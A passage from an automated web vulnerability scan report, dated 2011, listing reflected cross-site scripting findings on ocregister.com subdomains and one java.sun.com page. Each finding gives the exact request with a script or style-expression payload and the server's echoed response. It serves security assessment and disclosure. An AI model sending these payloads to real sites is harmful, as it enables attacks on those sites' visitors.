1.173. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f14"><script>alert(1)</script>e4a4ce6c848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f14\"><script>alert(1)</script>e4a4ce6c848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14"><script>alert(1)</script>e4a4ce6c848=1 HTTP/1.1 Host: inyourface.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://inyourface.ocregister.com/xmlrpc.php Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 84939
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... lication/rss+xml" title=" TV bride won more surgery than she knew - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14\"><script>alert(1)</script>e4a4ce6c848=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26 was submitted in the REST URL parameter 1. This input was echoed as 4966c"style="x:expression(alert(1))"f842afe3d26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab HTTP/1.1 Host: java.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 03 Feb 2011 16:20:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sun Microsystems</title> <!-- BEGIN METADATA --> <meta http-equiv="content-type" content="text/html; charse ...[SNIP]... <a href="/contact/feedback.jsp? referer=http://java.sun.com/notfound.jsp &requrl=http://java.sun.com/4966c"style="x:expression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab &refurl=http://java.sun.com/UserTypedUrl &category=se"> ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>1c47112440a was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8adda"><script>alert(1)</script>15e0db13ad7 was submitted in the REST URL parameter 5. This input was echoed as 8adda\"><script>alert(1)</script>15e0db13ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/oceanfront-with-killer-views-a-deal/142248adda"><script>alert(1)</script>15e0db13ad7/ HTTP/1.1 Host: lagunahomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:36 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 42419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... el="alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/142248adda\"><script>alert(1)</script>15e0db13ad7/feed/" /> ...[SNIP]...
1.177. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7745"><script>alert(1)</script>ced09a70bf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7745\"><script>alert(1)</script>ced09a70bf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745"><script>alert(1)</script>ced09a70bf4=1 HTTP/1.1 Host: lagunahomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:17 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... lication/rss+xml" title=" Oceanfront with killer views a deal? - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745\"><script>alert(1)</script>ced09a70bf4=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f68e"><script>alert(1)</script>a746ad081d4 was submitted in the REST URL parameter 5. This input was echoed as 9f68e\"><script>alert(1)</script>a746ad081d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e"><script>alert(1)</script>a746ad081d4/ HTTP/1.1 Host: lagunahomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:19 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:20 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 42440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e\"><script>alert(1)</script>a746ad081d4/feed/" /> ...[SNIP]...
1.179. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 366d8"><script>alert(1)</script>65b84b53c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 366d8\"><script>alert(1)</script>65b84b53c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8"><script>alert(1)</script>65b84b53c1=1 HTTP/1.1 Host: lagunahomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:17 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... /rss+xml" title=" Laguna Beach home sales up 13% over year - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8\"><script>alert(1)</script>65b84b53c1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b73"><script>alert(1)</script>49eaba8a56a was submitted in the REST URL parameter 5. This input was echoed as 79b73\"><script>alert(1)</script>49eaba8a56a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/really-no-housing-slump-in-san-marino/9774079b73"><script>alert(1)</script>49eaba8a56a/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/9774079b73\"><script>alert(1)</script>49eaba8a56a/feed/" /> ...[SNIP]...
1.181. http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2156"><script>alert(1)</script>7f4f3a0d6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2156\"><script>alert(1)</script>7f4f3a0d6f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156"><script>alert(1)</script>7f4f3a0d6f7=1 HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:24 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:24 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156\"><script>alert(1)</script>7f4f3a0d6f7=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9132"><script>alert(1)</script>89260b73642 was submitted in the REST URL parameter 5. This input was echoed as a9132\"><script>alert(1)</script>89260b73642 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/a-new-home-for-kobe-bryant/97596a9132"><script>alert(1)</script>89260b73642/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:46 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596a9132\"><script>alert(1)</script>89260b73642/feed/" /> ...[SNIP]...
1.183. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/2011/02/02/a-new-home-for-kobe-bryant/97596/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa939"><script>alert(1)</script>23a10abfd00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa939\"><script>alert(1)</script>23a10abfd00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939"><script>alert(1)</script>23a10abfd00=1 HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:27 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 117579
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ternate" type="application/rss+xml" title=" A new home for Kobe Bryant? - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939\"><script>alert(1)</script>23a10abfd00=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6f3"><script>alert(1)</script>2d65ca2126c was submitted in the REST URL parameter 5. This input was echoed as ec6f3\"><script>alert(1)</script>2d65ca2126c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3"><script>alert(1)</script>2d65ca2126c/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:50 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3\"><script>alert(1)</script>2d65ca2126c/feed/" /> ...[SNIP]...
1.185. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e2a"><script>alert(1)</script>2f16017d2e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37e2a\"><script>alert(1)</script>2f16017d2e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a"><script>alert(1)</script>2f16017d2e8=1 HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:28 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 103079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... application/rss+xml" title=" Homebuilding slump now 3 years old - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a\"><script>alert(1)</script>2f16017d2e8=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de683"><script>alert(1)</script>9b3add21ddf was submitted in the REST URL parameter 5. This input was echoed as de683\"><script>alert(1)</script>9b3add21ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/orange-county-property/98182de683"><script>alert(1)</script>9b3add21ddf/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:02 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:04 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182de683\"><script>alert(1)</script>9b3add21ddf/feed/" /> ...[SNIP]...
1.187. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/2011/02/03/orange-county-property/98182/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abaf"><script>alert(1)</script>e1b7c34c143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abaf\"><script>alert(1)</script>e1b7c34c143 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/orange-county-property/98182/?6abaf"><script>alert(1)</script>e1b7c34c143=1 HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 145345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... pe="application/rss+xml" title=" 5th straight jump for O.C. property index - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/?6abaf\"><script>alert(1)</script>e1b7c34c143=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969aa"><script>alert(1)</script>21e3c1a89f6 was submitted in the REST URL parameter 1. This input was echoed as 969aa\"><script>alert(1)</script>21e3c1a89f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category969aa"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category969aa\"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35fdf"><script>alert(1)</script>012deb55675 was submitted in the REST URL parameter 2. This input was echoed as 35fdf\"><script>alert(1)</script>012deb55675 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks35fdf"><script>alert(1)</script>012deb55675/eyeball-11/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Eyeball ’11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks35fdf\"><script>alert(1)</script>012deb55675/eyeball-11/feed/" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1d12"><script>alert(1)</script>f582b534ec7 was submitted in the REST URL parameter 3. This input was echoed as f1d12\"><script>alert(1)</script>f582b534ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks/eyeball-11f1d12"><script>alert(1)</script>f582b534ec7/ HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:36 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11f1d12\"><script>alert(1)</script>f582b534ec7/feed/" /> ...[SNIP]...
1.191. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/category/outlooks/eyeball-11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c705"><script>alert(1)</script>feb32e4d31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c705\"><script>alert(1)</script>feb32e4d31b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks/eyeball-11/?3c705"><script>alert(1)</script>feb32e4d31b=1 HTTP/1.1 Host: lansner.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:25 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://lansner.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Eyeball ’11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11/?3c705\"><script>alert(1)</script>feb32e4d31b=1feed/" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6706"><script>alert(1)</script>6bccede39c1 was submitted in the REST URL parameter 4. This input was echoed as b6706\"><script>alert(1)</script>6bccede39c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/states-economic-rock-bottom-closer-than-everb6706"><script>alert(1)</script>6bccede39c1 HTTP/1.1 Host: letters.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
